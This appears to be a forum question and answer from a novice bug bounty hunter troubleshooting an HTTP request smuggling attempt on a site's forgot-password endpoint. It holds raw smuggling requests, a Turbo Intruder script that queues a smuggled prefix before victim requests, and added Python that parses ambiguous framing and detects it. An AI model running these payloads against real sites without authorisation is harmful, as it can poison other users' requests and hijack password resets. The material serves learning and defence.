Strange responses when using Turbo Intruder

I am a bug bounty hunter and still new to it. A few days ago I read about the request smuggling vulnerability, and right after that I started looking for it on the web. Yesterday I found a website that, when I added X-Forwarded-Host: google.com to the headers, redirected me to it. That is hard to exploit on its own, so I thought about combining it with request smuggling. I chose the change-password request as the target:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
Then I ran it with Turbo Intruder. I was very surprised: it sent 14 requests, but only 12 of them were 503 and the remaining 2 were 200. In particular, the 200 response headers contained ... Transfer-Encoding: chunked .... I tried several times and the result was always the same: 1 to 2 requests got a 200. But there is one strange thing in the code, which is ... prefix='''GET /hopefully404 HTTP/1.1
X-Ignore: X''' .... After a few tests, I think this is not a request smuggling bug, because the response shows that it is the response to the original request and not to the prefix in the code; I also tried changing the prefix, and it still came back 200 instead of 400 or 404 ... as I expected.
So is there anyone, who must be a very professional hacker, who knows what vulnerability I am facing? Thanks everyone!

First, your first converted request is chunked as TE.CL, but after using the Burp extension you found it as CL.TE, so the problem may be there. As for your answer, which is a bit confusing, I suggest you work through the PortSwigger HTTP request smuggling labs, because I recently completed them and your fundamentals will become very strong.
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
0
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
import time  # needed for time.sleep below (harmless if Turbo Intruder already imports it)

# RequestEngine, Engine and table are provided by Turbo Intruder's script environment.
def queueRequests(target, wordlists):
    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)

    # Queue the victim requests right after the attack request on fresh connections
    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)
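To make the answer's CL versus TE point concrete, here is an added example (not from the question, the answer, or the Turbo Intruder project) that parses one constructed request, whose Content-Length and chunked framing deliberately disagree, the way a Content-Length-only server and a Transfer-Encoding-only server would, and a check a front-end can apply to refuse such messages. The request bytes, the /hopefully404 trailer and the Content-Length value are constructed for this example.

```python
# Constructed sample (not the poster's request): Content-Length covers the whole
# body, while the chunked framing ends after "a=1&"; the trailing bytes mirror
# the prefix used in the Turbo Intruder script above.
SAMPLE = (
    b"POST /my-rx/forgot-password HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 53\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"4\r\n"
    b"a=1&\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /hopefully404 HTTP/1.1\r\n"
    b"X-Ignore: X"
)

def split_headers(raw):
    """Split a raw HTTP/1.1 message into a lowercase header dict and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def body_by_cl(raw):
    """Content-Length-only parser: body is exactly CL bytes, rest is leftover."""
    headers, body = split_headers(raw)
    n = int(headers[b"content-length"])
    return body[:n], body[n:]

def body_by_te(raw):
    """Transfer-Encoding-only parser: consume chunks up to the zero chunk."""
    _, body = split_headers(raw)
    out, pos = b"", 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            return out, body[pos + 2:]  # skip the CRLF that ends the zero chunk
        out += body[pos:pos + size]
        pos += size + 2  # chunk data plus its CRLF

def is_ambiguous(raw):
    """Front-end check: both framing headers present, so the message must not be
    forwarded as-is (RFC 7230 section 3.3.3 requires dropping Content-Length)."""
    headers, _ = split_headers(raw)
    return b"content-length" in headers and b"transfer-encoding" in headers
```

The CL-only parser consumes the entire body and leaves nothing over, while the TE-only parser stops at the zero chunk and leaves the GET bytes on the connection, which is the disagreement the two responses in the question would have to come from.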